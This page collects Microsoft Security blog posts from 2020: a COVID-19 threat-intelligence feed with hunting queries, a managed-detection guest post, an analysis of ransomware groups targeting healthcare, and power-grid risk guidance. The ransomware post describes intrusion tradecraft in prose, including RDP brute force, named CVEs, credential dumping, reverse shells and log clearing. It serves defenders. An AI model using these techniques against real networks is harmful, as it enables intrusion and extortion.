Justin Carroll, Cole Sodja, Mike Flowers, Joshua Neil, Jonathan Bar Or, Dustin Duran

Microsoft Threat Protection Team

 

The post The science behind Microsoft Threat Protection: Attack modeling for finding and stopping evasive ransomware appeared first on Microsoft Security.

Open-sourcing new COVID-19 threat intelligence

May 14th, 2020 No comments

A global threat requires a global response. While the world faces the common threat of COVID-19, defenders are working overtime to protect users all over the globe from cybercriminals using COVID-19 as a lure to mount attacks. As a security intelligence community, we are stronger when we share information that offers a more complete view of attackers’ shifting techniques. This more complete view enables us all to be more proactive in protecting, detecting, and defending against attacks.

At Microsoft, our security products provide built-in protections against these and other threats, and we’ve published detailed guidance to help organizations combat current threats (Responding to COVID-19 together). Our threat experts are sharing examples of malicious lures and we have enabled guided hunting of COVID-themed threats using Azure Sentinel Notebooks. Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack. Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. Microsoft Threat Protection (MTP) customers are already protected against the threats identified by these indicators across endpoints with Microsoft Defender Advanced Threat Protection (ATP) and email with Office 365 ATP.

In addition, we are publishing these indicators for those not protected by Microsoft Threat Protection to raise awareness of attackers’ shift in techniques, how to spot them, and how to enable your own custom hunting. These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.

This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.

This COVID-specific threat intelligence feed represents a start at sharing some of Microsoft’s COVID-related IOCs. We will continue to explore ways to improve the data over the duration of the crisis. While some threats and actors are still best defended more discreetly, we are committed to greater transparency and taking community feedback on what types of information is most useful to defenders in protecting against COVID-related threats. This is a time-limited feed. We are maintaining this feed through the peak of the outbreak to help organizations focus on recovery.

Protection in Azure Sentinel and Microsoft Threat Protection

Today’s release includes file hash indicators related to email-based attachments identified as malicious and attempting to trick users with COVID-19 or Coronavirus-themed lures. The guidance below provides instructions on how to access and integrate this feed in your own environment.

For Azure Sentinel customers, these indicators can be either be imported directly into Azure Sentinel using a Playbook or accessed directly from queries.

The Azure Sentinel Playbook that Microsoft has authored will continuously monitor and import these indicators directly into your Azure Sentinel ThreatIntelligenceIndicator table. This Playbook will match with your event data and generate security incidents when the built-in threat intelligence analytic templates detect activity associated to these indicators.

These indicators can also be accessed directly from Azure Sentinel queries as follows:

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"));
covidIndicators

Azure Sentinel logs.

A sample detection query is also provided in the Azure Sentinel GitHub. With the table definition above, it is as simple as:

  1. Join the indicators against the logs ingested into Azure Sentinel as follows:
covidIndicators
| join ( CommonSecurityLog | where TimeGenerated >= ago(7d)
| where isnotempty(FileHashValue)
) on $left.FileHashValue == $right.FileHash
  1. Then, select “New alert rule” to configure Azure Sentinel to raise incidents based on this query returning results.

CyberSecurityDemo in Azure Sentinel logs.

You should begin to see Alerts in Azure Sentinel for any detections related to these COVID threat indicators.

Microsoft Threat Protection provides protection for the threats associated with these indicators. Attacks with these Covid-19-themed indicators are blocked by Office 365 ATP and Microsoft Defender ATP.

While MTP customers are already protected, they can also make use of these indicators for additional hunting scenarios using the MTP Advanced Hunting capabilities.

Here is a hunting query to see if any process created a file matching a hash on the list.

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"))
| where FileHashType == 'sha256' and TimeGenerated > ago(1d);
covidIndicators
| join (DeviceFileEvents
| where Timestamp > ago(1d)
| where ActionType == 'FileCreated'
| take 100) on $left.FileHashValue  == $right.SHA256

Advanced hunting in Microsoft Defender Security Center.

This is an Advanced Hunting query in MTP that searches for any recipient of an attachment on the indicator list and sees if any recent anomalous log-ons happened on their machine. While COVID threats are blocked by MTP, users targeted by these threats may be at risk for non-COVID related attacks and MTP is able to join data across device and email to investigate them.

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )    [@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"] with (format="csv"))
| where FileHashType == 'sha256' and TimeGenerated > ago(1d);
covidIndicators
| join (  EmailAttachmentInfo  | where Timestamp > ago(1d)
| project NetworkMessageId , SHA256
) on $left.FileHashValue  == $right.SHA256
| join (
EmailEvents
| where Timestamp > ago (1d)
) on NetworkMessageId
| project TimeEmail = Timestamp, Subject, SenderFromAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0])
| join (
DeviceLogonEvents
| project LogonTime = Timestamp, AccountName, DeviceName
) on AccountName
| where (LogonTime - TimeEmail) between (0min.. 90min)
| take 10

Advanced hunting in Microsoft 365 security.

Connecting an MISP instance to Azure Sentinel

The indicators published on the Azure Sentinel GitHub page can be consumed directly via MISP’s feed functionality. We have published details on doing this at this URL: https://aka.ms/msft-covid19-misp. Please refer to the Azure Sentinel documentation on connecting data from threat intelligence providers.

Using the indicators if you are not an Azure Sentinel or MTP customer

Yes, the Azure Sentinel GitHub is public: https://aka.ms/msft-covid19-Indicators

Examples of phishing campaigns in this threat intelligence

The following is a small sample set of the types of COVID-themed phishing lures using email attachments that will be represented in this feed. Beneath each screenshot are the relevant hashes and metadata.

Figure 1: Spoofing WHO branding with “cure” and “vaccine” messaging with a malicious .gz file.

Name: CURE FOR CORONAVIRUS_pdf.gz

World Health Organization phishing email.

Figure 2: Spoofing Red Cross Safety Tips with malicious .docm file.

Name: COVID-19 SAFETY TIPS.docm

Red Cross phishing email.

Figure 3: South African banking lure promoting COVID-19 financial relief with malicious .html files.

Name: SBSA-COVID-19-Financial Relief.html

Financial relief phishing email.

Figure 4: French language spoofed correspondence from the WHO with malicious XLS Macro file.

Name:✉-Covid-19 Relief Plan5558-23636sd.htm

Coronavirus-themed phishing email.

If you have questions or feedback on this COVID-19 feed, please email msft-covid19-ti@microsoft.com.

The post Open-sourcing new COVID-19 threat intelligence appeared first on Microsoft Security.

How to gain 24/7 detection and response coverage with Microsoft Defender ATP

May 6th, 2020 No comments

This blog post is part of the Microsoft Intelligence Security Association guest blog series. To learn more about MISA, go here.

Whether you’re a security team of one or a dozen, detecting and stopping threats around the clock is a challenge. Security incidents don’t happen exclusively during business hours: attackers often wait until the late hours of the night to breach an environment.

At Red Canary, we work with security teams of all shapes and sizes to improve detection and response capabilities. Our Security Operations Team investigates threats in customer environments 24/7/365, removes false positives, and delivers confirmed threats with context. We’ve seen teams run into a wide range of issues when trying to establish after-hours coverage on their own, including:

  • For global enterprises, around-the-clock monitoring can significantly increase the pressure on a U.S.–based security team. If you have personnel around the world, a security team in a single time zone isn’t sufficient to cover the times that computing assets are used in those environments.
  • In smaller companies that don’t have global operations, the security team is more likely to be understaffed and unable to handle 24/7 security monitoring without stressful on-call schedules.
  • For the security teams of one, being “out of office” is a foreign concept. You’re always on. And you need to set up some way to monitor the enterprise while you’re away.

Microsoft Defender Advanced Threat Protection (ATP) is an industry leading endpoint security solution that’s built into Windows with extended capabilities to Mac and Linux servers. Red Canary unlocks the telemetry delivered from Microsoft Defender ATP and investigates every alert, enabling you to immediately increase your detection coverage and waste no time with false positives.

Here’s how those who haven’t started with Red Canary yet can answer the question, “How can I support my 24/7 security needs with Microsoft Defender ATP?”

No matter how big your security team is, the most important first step is notifying the right people based on an on-call schedule. In this post, we’ll describe two different ways of getting Microsoft Defender ATP alerts to your team 24×7 and how Red Canary has implemented this for our customers.

Basic 24/7 via email

Microsoft Defender Security Center allows you to send all Microsoft Defender ATP alerts to an email address. You can set up email alerts under Settings → Alert notifications.

MISA1

Email notification settings in Microsoft Defender Security Center.

These emails will be sent to your team and should be monitored for high severity situations after-hours.

If sent to a ticketing system, these emails can trigger tickets or after-hours pages to be created for your security team. We recommend limiting the alerts to medium and high severity so that you won’t be bothered for informational or low alerts.

MISA2

Setting up alert emails in Microsoft Defender ATP to be sent to a ticketing system.

Now any future alerts will create a new ticket in your ticketing system where you can assign security team members to on-call rotations and notify on-call personnel of new alerts (if supported). Once the notification is received by on-call personnel, they would then log into Microsoft Defender’s Security Center for further investigation and triage. 

Enhanced 24/7 via APIs

What if you want to ingest alerts to a system that doesn’t use email? You can do this by using the Microsoft Defender ATP APIs. First, you’ll need to have an authentication token. You can get the token like we do here:

MISA3

API call to retrieve authentication token.

Once you’ve stored the authentication token you can use it to poll the Microsoft Defender ATP API and retrieve alerts from Microsoft Defender ATP. Here’s an example of the code to pull new alerts.

MISA4

API call to retrieve alerts from Microsoft Defender ATP.

The API only returns a subset of the data associated with each alert. Here’s an example of what you might receive.

MISA5

Example of a Microsoft Defender ATP alert returned from the API.

You can then take this data and ingest it into any of your internal tools. You can learn more about how to access Microsoft Defender ATP APIs in the documentation. Please note, the limited information included in an alert email or API response is not enough to triage the behavior. You will still need to log into the Microsoft Defender Security Center to find out what happened and take appropriate action.

24/7 with Red Canary

By enabling Red Canary, you supercharge your Microsoft Defender ATP deployment by adding a proven 24×7 security operations team who are masters at finding and stopping threats, and an automation platform to quickly remediate and get back to business.

Red Canary continuously ingests all of the raw telemetry generated from your instance of Microsoft Defender ATP as the foundation for our service. We also ingest and monitor Microsoft Defender ATP alerts. We then apply thousands of our own proprietary analytics to identify potential threats that are sent 24/7 to a Red Canary detection engineer for review.

Here’s an overview of the process (to go behind the scenes of these operations check out our detection engineering blog series):

MISA6

Managed detection and response with Red Canary.

Red Canary is monitoring your Microsoft Defender ATP telemetry and alerts. If anything is a confirmed threat, our team creates a detection and sends it to you using a built-in automation framework that supports email, SMS, phone, Microsoft Teams/Slack, and more. Below is an example of what one of those detections might look like.

MISA7

Red Canary confirms threats and prioritizes them so you know what to focus on.

At the top of the detection timeline you’ll receive a short description of what happened. The threat has already been examined by a team of detection engineers from Red Canary’s Cyber Incident Response Team (CIRT), so you don’t have to worry about triage or investigation. As you scroll down, you can quickly see the results of the investigation that Red Canary’s senior detection engineers have done on your behalf, including detailed notes that provide context to what’s happening in your environment:

MISA8

Notes from Red Canary senior detection engineers (in light blue) provide valuable context.

You’re only notified of true threats and not false positives. This means you can focus on responding rather than digging through data to figure out what happened.

What if you don’t want to be woken up, you’re truly unavailable, or you just want bad stuff immediately dealt with? Use Red Canary’s automation to handle remediation on the fly. You and your team can create playbooks in your Red Canary portal to respond to threats immediately, even if you’re unavailable.

MISA9

Red Canary automation playbook.

This playbook allows you to isolate the endpoint (using the Machine Action resource type in the Microsoft Defender ATP APIs) if Red Canary identifies suspicious activity. You also have the option to set up Automate playbooks that depend on an hourly schedule. For example, you may want to approve endpoint isolation during normal work hours, but use automatic isolation overnight:

MISA10

Red Canary Automate playbook to automatically remediate a detection.

Getting started with Red Canary

Whether you’ve been using Microsoft Defender ATP since it’s preview releases or if you’re just getting started, Red Canary is the fastest way to accelerate your security operations program. Immediate onboarding, increased detection coverage, and a 24/7 CIRT team are all at your fingertips.

Terence Jackson, CISO at Thycotic and Microsoft Defender ATP user, describes what it’s like working with Red Canary:

“I have a small team that has to protect a pretty large footprint. I know the importance of detecting, preventing, and stopping problems at the entry point, which is typically the endpoint. We have our corporate users but then we also have SaaS customers we have to protect. Currently my team tackles both, so for me it’s simply having a trusted partner that can take the day-to-day hunting/triage/elimination of false positives and only provide actionable alerts/intel, which frees my team up to do other critical stuff.”

Red Canary is the fastest way to enhance your detection coverage from Microsoft Defender ATP so you know exactly when and where to respond.

Contact us to see a demo and learn more.

The post How to gain 24/7 detection and response coverage with Microsoft Defender ATP appeared first on Microsoft Security.

Ransomware groups continue to target healthcare, critical services; here’s how to reduce risk

April 28th, 2020 No comments

At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.

Multiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.

The ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of human-operated ransomware campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.

Many of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker’s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.

In this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:

We have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).

Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks

While the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.

In stark contrast to attacks that deliver ransomware via email—which tend to unfold much faster, with ransomware deployed within an hour of initial entry—the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.

To gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:

  • Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)
  • Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords
  • Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers
  • Citrix Application Delivery Controller (ADC) systems affected by CVE-2019-19781
  • Pulse Secure VPN systems affected by CVE-2019-11510

Applying security patches for internet-facing systems is critical in preventing these attacks. It’s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: CVE-2019-0604, CVE-2020-0688, CVE-2020-10189.

Like many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.

As with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it’s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.

A motley crew of ransomware payloads

While individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.

diagram showing different attack stages and techniques in each stage that various ransomware groups use

RobbinHood ransomware

RobbinHood ransomware operators gained some attention for exploiting vulnerable drivers late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.

Vatet loader

Attackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.

The group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.

Using Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit CVE-2019-19781, brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.

NetWalker ransomware

NetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.

PonyFinal ransomware

This Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren’t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.

Maze ransomware

One of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.

Maze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.

In a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.

After gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.

REvil ransomware

Possibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers – and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.

Other ransomware families

Other ransomware families used in human-operated campaigns during this period include:

  • Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks
  • RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials
  • MedusaLocker, which is possibly deployed via existing Trickbot infections
  • LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally

Immediate response actions for active attacks

We highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:

  • Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities
  • Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials
  • Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data

Customers using Microsoft Defender Advanced Threat Protection (ATP) can consult a companion threat analytics report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the Microsoft Threat Experts service can also refer to the targeted attack notification, which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.

If your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ “one-time use” infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.

Investigate affected endpoints and credentials

Investigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.

  • For endpoints onboarded to Microsoft Defender ATP, use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.
  • Otherwise, check the Windows Event Log for post-compromise logons—those that occur after or during the earliest suspected breach activity—with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.

Isolate compromised endpoints

Isolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. Isolate machines using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.

Address internet-facing weaknesses

Identify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as shodan.io, to augment your own data. Systems that should be considered of interest to attackers include:

  • RDP or Virtual Desktop endpoints without MFA
  • Citrix ADC systems affected by CVE-2019-19781
  • Pulse Secure VPN systems affected by CVE-2019-11510
  • Microsoft SharePoint servers affected by CVE-2019-0604
  • Microsoft Exchange servers affected by CVE-2020-0688
  • Zoho ManageEngine systems affected by CVE-2020-10189

To further reduce organizational exposure, Microsoft Defender ATP customers can use the Threat and Vulnerability Management (TVM) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.

Inspect and rebuild devices with related malware infections

Many ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.

Building security hygiene to defend networks against human-operated ransomware

As ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions—credential hygiene, minimal privileges, and host firewalls—to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.

Apply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:

  • Randomize local administrator passwords using a tool such as LAPS.
  • Apply Account Lockout Policy.
  • Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.
  • Utilize host firewalls to limit lateral movement. Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.
  • Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
  • Follow standard guidance in the security baselines for Office and Office 365 and the Windows security baselines. Use Microsoft Secure Score assesses to measures security posture and get recommended improvement actions, guidance, and control.
  • Turn on tamper protection features to prevent attackers from stopping security services.
  • Turn on attack surface reduction rules, including rules that can block ransomware activity:
    • Use advanced protection against ransomware
    • Block process creations originating from PsExec and WMI commands
    • Block credential stealing from the Windows local security authority subsystem (lsass.exe)

For additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read Human-operated ransomware attacks: A preventable disaster.

Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware

What we’ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services—in this time of global crisis—that their attacks cause.

Human-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can’t break through a wall, they’ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.

Microsoft Threat Protections (MTP) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.

Through built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.

Microsoft Threat Protection is also part of a chip-to-cloud security approach that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On Secured-core PCs these mitigations are enabled by default.

We continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the Microsoft Detection and Response (DART) team to help investigate and remediate.

 

Microsoft Threat Protection Intelligence Team

 

Appendix: MITRE ATT&CK techniques observed

Human-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.

Credential access

Persistence

Command and control

Discovery

Execution

Lateral movement

Defense evasion

  • T1070 Indicator Removal on Host | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe
  • T1089 Disabling Security Tools | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers

Impact

The post Ransomware groups continue to target healthcare, critical services; here’s how to reduce risk appeared first on Microsoft Security.

Defending the power grid against supply chain attacks: Part 3 – Risk management strategies for the utilities industry

April 22nd, 2020 No comments

Over the last fifteen years, attacks against critical infrastructure (figure1) have steadily increased in both volume and sophistication. Because of the strategic importance of this industry to national security and economic stability, these organizations are targeted by sophisticated, patient, and well-funded adversaries.  Adversaries often target the utility supply chain to insert malware into devices destined for the power grid. As modern infrastructure becomes more reliant on connected devices, the power industry must continue to come together to improve security at every step of the process.

Aerial view of port and freeways leading to downtown Singapore.

Figure 1: Increased attacks on critical infrastructure

This is the third and final post in the “Defending the power grid against supply chain attacks” series. In the first blog I described the nature of the risk. Last month I outlined how utility suppliers can better secure the devices they manufacture. Today’s advice is directed at the utilities. There are actions you can take as individual companies and as an industry to reduce risk.

Implement operational technology security best practices

According to Verizon’s 2019 Data Breach Investigations Report, 80 percent of hacking-related breaches are the result of weak or compromised passwords. If you haven’t implemented multi-factor authentication (MFA) for all your user accounts, make it a priority. MFA can significantly reduce the likelihood that a user with a stolen password can access your company assets. I also recommend you take these additional steps to protect administrator accounts:

  • Separate administrative accounts from the accounts that IT professionals use to conduct routine business. While administrators are answering emails or conducting other productivity tasks, they may be targeted by a phishing campaign. You don’t want them signed into a privileged account when this happens.
  • Apply just-in-time privileges to your administrator accounts. Just-in-time privileges require that administrators only sign into a privileged account when they need to perform a specific administrative task. These sign-ins go through an approval process and have a time limit. This will reduce the possibility that someone is unnecessarily signed into an administrative account.

 

Image 2

Figure 2: A “blue” path depicts how a standard user account is used for non-privileged access to resources like email and web browsing and day-to-day work. A “red” path shows how privileged access occurs on a hardened device to reduce the risk of phishing and other web and email attacks. 

  • You also don’t want the occasional security mistake like clicking on a link when administrators are tired or distracted to compromise the workstation that has direct access to these critical systems.  Set up privileged access workstations for administrative work. A privileged access workstation provides a dedicated operating system with the strongest security controls for sensitive tasks. This protects these activities and accounts from the internet. To encourage administrators to follow security practices, make sure they have easy access to a standard workstation for other more routine tasks.

The following security best practices will also reduce your risk:

  • Whitelist approved applications. Define the list of software applications and executables that are approved to be on your networks. Block everything else. Your organization should especially target systems that are internet facing as well as Human-Machine Interface (HMI) systems that play the critical role of managing generation, transmission, or distribution of electricity
  • Regularly patch software and operating systems. Implement a monthly practice to apply security patches to software on all your systems. This includes applications and Operating Systems on servers, desktop computers, mobile devices, network devices (routers, switches, firewalls, etc.), as well as Internet of Thing (IoT) and Industrial Internet of Thing (IIoT) devices. Attackers frequently target known security vulnerabilities.
  • Protect legacy systems. Segment legacy systems that can no longer be patched by using firewalls to filter out unnecessary traffic. Limit access to only those who need it by using Just In Time and Just Enough Access principles and requiring MFA. Once you set up these subnets, firewalls, and firewall rules to protect the isolated systems, you must continually audit and test these controls for inadvertent changes, and validate with penetration testing and red teaming to identify rogue bridging endpoint and design/implementation weaknesses.
  • Segment your networks. If you are attacked, it’s important to limit the damage. By segmenting your network, you make it harder for an attacker to compromise more than one critical site. Maintain your corporate network on its own network with limited to no connection to critical sites like generation and transmission networks. Run each generating site on its own network with no connection to other generating sites. This will ensure that should a generating site become compromised, attackers can’t easily traverse to other sites and have a greater impact.
  • Turn off all unnecessary services. Confirm that none of your software has automatically enabled a service you don’t need. You may also discover that there are services running that you no longer use. If the business doesn’t need a service, turn it off.
  • Deploy threat protection solutions. Services like Microsoft Threat Protection help you automatically detect, respond to, and correlate incidents across domains.
  • Implement an incident response plan: When an attack happens, you need to respond quickly to reduce the damage and get your organization back up and running. Refer to Microsoft’s Incident Response Reference Guide for more details.

Speak with one voice

